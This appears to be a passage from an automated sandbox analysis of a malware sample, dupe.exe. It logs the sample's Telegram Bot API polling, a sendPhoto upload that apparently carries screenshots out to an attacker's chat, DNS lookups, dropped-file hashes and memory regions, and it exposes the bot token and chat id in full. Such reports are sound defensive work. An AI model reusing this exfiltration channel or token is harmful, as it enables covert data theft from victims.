      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628356

      HTTP Response

      200
    • 149.154.167.220:443
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendPhoto?chat_id=5623362319
      tls, http
      dupe.exe
      439.7kB
      10.9kB
      326
      233

      HTTP Request

      POST https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendPhoto?chat_id=5623362319

      HTTP Response

      200
    • 8.8.8.8:53
      81.144.22.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      81.144.22.2.in-addr.arpa

    • 8.8.8.8:53
      154.239.44.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      154.239.44.20.in-addr.arpa

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      151 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      13.107.21.237
      204.79.197.237

    • 8.8.8.8:53
      237.21.107.13.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      237.21.107.13.in-addr.arpa

    • 8.8.8.8:53
      88.156.103.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      88.156.103.20.in-addr.arpa

    • 8.8.8.8:53
      google.com
      dns
      dupe.exe
      56 B
      72 B
      1
      1

      DNS Request

      google.com

      DNS Response

      142.250.200.46

    • 8.8.8.8:53
      api.telegram.org
      dns
      dupe.exe
      124 B
      78 B
      2
      1

      DNS Request

      api.telegram.org

      DNS Request

      api.telegram.org

      DNS Response

      149.154.167.220

    • 8.8.8.8:53
      220.167.154.149.in-addr.arpa
      dns
      74 B
      167 B
      1
      1

      DNS Request

      220.167.154.149.in-addr.arpa

    • 8.8.8.8:53
      209.205.72.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      209.205.72.20.in-addr.arpa

    • 8.8.8.8:53
      157.123.68.40.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      157.123.68.40.in-addr.arpa

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      172.214.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.214.232.199.in-addr.arpa

    • 8.8.8.8:53
      73.144.22.2.in-addr.arpa
      dns
      70 B
      133 B
      1
      1

      DNS Request

      73.144.22.2.in-addr.arpa

    • 8.8.8.8:53
      29.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      29.243.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmp91A1.tmp.bat

      Filesize

      197B

      MD5

      c2da525f000512df8189879d8a22aaf5

      SHA1

      2eb898dce2eadae799eff2a1ff18c6c4884d87d5

      SHA256

      bf0d737a228fb7a80cb635f733bb12bcdd63100f3fca04c4d923843a1147c6e0

      SHA512

      1a232b28d1ebadcbfc08cba26239969535f33ffc1191c75098f7a963b0ae74b5d07efd959ed6bfa28d226092a8beffc41c058d2e51287a80d80a7d5c748bc89f

    • C:\Users\Public\Downloads\dupe.exe

      Filesize

      111KB

      MD5

      3c6f5e7ca1f0279c860554b7b4dfaf5d

      SHA1

      15c4baaa666353eb7dd5d28a76aead8bf14bc352

      SHA256

      f7514a2e0e612b0b4211c4655fedc3a7052578f38f1bfe131e2213102c164e34

      SHA512

      1c8ac972d4ef27ec0f80e850137a8f19c95c72b97f2dede9c4d0caf007709133a5f2e248f6f04bc6e30fbbea742b8f4ae66a4f3408ab0d00ca48c48865947b09

    • memory/1644-1-0x000001B77F900000-0x000001B77F922000-memory.dmp

      Filesize

      136KB

    • memory/1644-0-0x00007FFF03BF3000-0x00007FFF03BF5000-memory.dmp

      Filesize

      8KB

    • memory/1644-2-0x00007FFF03BF0000-0x00007FFF046B1000-memory.dmp

      Filesize

      10.8MB

    • memory/1644-6-0x00007FFF03BF0000-0x00007FFF046B1000-memory.dmp

      Filesize

      10.8MB

    • memory/3456-11-0x00000168FB360000-0x00000168FB509000-memory.dmp

      Filesize

      1.7MB

    • memory/3456-12-0x00000168FB650000-0x00000168FB6FA000-memory.dmp

      Filesize

      680KB

    • memory/3456-13-0x00000168FB700000-0x00000168FB776000-memory.dmp

      Filesize

      472KB

    • memory/3456-21-0x00000168FB360000-0x00000168FB509000-memory.dmp

      Filesize

      1.7MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.